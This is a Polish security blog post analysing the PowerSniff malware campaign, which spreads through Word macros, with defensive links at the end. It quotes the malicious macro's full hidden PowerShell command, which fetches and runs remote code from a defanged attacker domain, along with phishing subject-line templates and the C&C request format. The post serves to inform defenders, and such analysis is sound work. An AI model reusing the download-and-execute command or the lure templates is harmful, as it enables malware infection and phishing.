15 mar 2016

Makra i PowerSniff, czyli jak cyberprzestępcy wykorzystują PowerShella poprzez pliki MS Word

0

W pierwszym kwartale bieżącego roku można zauważyć znaczący wzrost ataków wykorzystujących makra w plikach pakietu biurowego MS Office. Cyberprzestępcy prześcigają się w coraz to nowych rozwiązaniach, tworząc jeszcze bardziej zaawansowane mechanizmy umożliwiające przeprowadzenie ataku. Jednym z takich mechanizmów jest malware wykorzystujący makra oraz interpreter poleceń PowerShell, dzięki czemu otrzymał on nazwę PowerSniff. Jak dotąd, to złośliwe oprogramowanie rozsyłane jest za pomocą plików pakietu biurowego Microsoft Word, a celem ataków są również użytkownicy z Polski. Pliki te zawierają makra, które wykonują złośliwy kod na stacji roboczej ofiary. Ale po kolei...

Infekcja następuje z wykorzystaniem załącznika pakietu biurowego Office:

Wiadomość zawierająca złośliwy plik
(źródło: http://researchcenter.paloaltonetworks.com)





















Większość wiadomości zawiera informacje uwiarygodniające dotyczące atakującego podmiotu, mogą to być numery telefonów, adres, nazwa podmiotu itp. Takie dodatkowe, prawdziwe informacje są rzadko stosowane w kampaniach wykorzystujących spam, co może dodatkowo wzbudzić zaufanie i zmusić użytkownika do błędu. Przykładowe tematy złośliwych wiadomości w języku angielskim:

[Name], Please validate [Something] Gift Card from [Place]
[Name], Please validate this [Name] Gift Voucher
[Name], Please close this unpaid obligation #[Numbers]
[Name], New Reservation at [Place]
[Name], Please settle this unpaid balance [ID|Ref].[Numbers]
[Name], Please settle this overlooked payment [ID|Ref].[Numbers]

Jak dotąd nie mamy informacji o złośliwych e-mailach w języku polskim, co nie znaczy iż nie występują. Gdybyście się na takowe natknęli, prosimy o kontakt lub pozostawienie komentarza. Głównym celem ataków są użytkownicy z terenu Stanów Zjednoczonych, jednak kampania ta skierowana jest również do użytkowników z Polski, co przedstawia poniższa mapa:
źródło: http://researchcenter.paloaltonetworks.com

Kampania PowerSniff nie jest skierowana do żadnego konkretnego sektora, jednak można ją dostrzec w takich dziedzinach jak: przemysł, szkolnictwo, technologia, zdrowie, produkcja, budownictwo itd.

W przypadku, gdy ofiara otwiera złośliwy załącznik i gdy makra nie są wyłączone w systemie, zostaje wykonany złośliwy kod:

Kod złośliwego makra
(źródło: http://researchcenter.paloaltonetworks.com)








Złośliwe makro wywołuje usługę WMI i uruchamia ukrytą instancję Microsoft PowerShell poleceniem (URL dla celów bezpieczeństwa został zmieniony): 

powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -noprofile -noexit -c if ([IntPtr]::size -eq 4) {(new-object Net.WebClient).DownloadString('http://jakisadres[.]pw/cache') | iex } else {(new-object Net.WebClient).DownloadString('http://jakisadres[.]pw/css') | iex}

Składnia if / else ustala czy ofiara posiada 32 lub 64 bitowy system operacyjny, następnie przekierowuje na odpowiedni adres z końcówką: /css lub /cache, skąd pobiera złośliwy plik, dekoduje go (shellcode) i uruchamia:

Dekodowanie złośliwego pliku
(źródło: http://researchcenter.paloaltonetworks.com)

Po wykonaniu, odpowiedni kod uruchamia algorytm w języku Python, który określa odpowiednim ciągiem znaków maszynę ofiary. Algorytm i jego działania potrafią nawet uzyskać takie informacje jak to, czy ofiara korzysta w danym momencie z wirtualnej maszyny lub czy wykorzystuje połączenie VPN od Juniper (dana-na). Jeżeli określone warunki zostaną spełnione (słowa kluczowe powiązane głównie ze służbą zdrowia, przemysłem oraz edukacją), malware PowerSniff określa komputer ofiary jako "interesujący" i oznacza jako "666". Jeżeli żaden z warunków malware nie zostanie spełniony, stacja robocza zostaje oznaczona jako "555". Można również zauważyć, iż malware PowerSniff jako jeden z punktów docelowych obiera komputery powiązane z transakcjami finansowymi, co może stać się szczególnie niebezpieczne.

Po wykonaniu rekonesansu na komputerze ofiary, malware wysyła żądanie HTTP GET do jednego z serwerów C&C w następującym formacie:

/yuppi/?user=%08x%08x%08x%08x&id=%u&ver=%u&os=%lu&os2=%lu&host=%u&k=%lu&type=%u

 
Zmienna "type" zawiera wspomniany ciąg 555 lub 666. Jeżeli serwer C&C odpowie, malware dekoduje otrzymany złośliwy plik DLL, który jest tymczasowo zapisywany w tej lokalizacji:

%%userprofile%%\\AppData\\LocalLow\\[random].db


Po zapisie na dysku twardym, zostanie on wykonany za pomocą programu rundll32.exe, po czym komputer ofiary staje się botem.

Warto również wspomnieć, iż nie jest to pierwszy raz, gdy cyberprzestępcy wykorzystują tego typu mechanizmy do swoich celów, a doskonałym tego przykładem jest złośliwe oprogramowanie Ursniff, odkryte w połowie 2015 roku.

Jak bronić się przed tego typu złośliwym oprogramowaniem?
Polecamy nasz poradnik, dotyczący utwardzania (zabezpieczenia) i wykorzystania szablonów dla pakietu MS Office 2013:
http://www.zawszeczujni.pl/2016/03/utwardzanie-office-2013-czyli-jak.html

Polecamy również zapoznać się ze świeżą i ciekawą analizą zainfekowanych komputerów (botów), opracowaną przez zespół CERT.PL:
http://www.cert.pl/news/11101


Źródło:
http://researchcenter.paloaltonetworks.com

0 komentarze:

Publikowanie komentarza

 
Do korespondencji zalecamy nasz klucz PGP.
Design by ThemeShift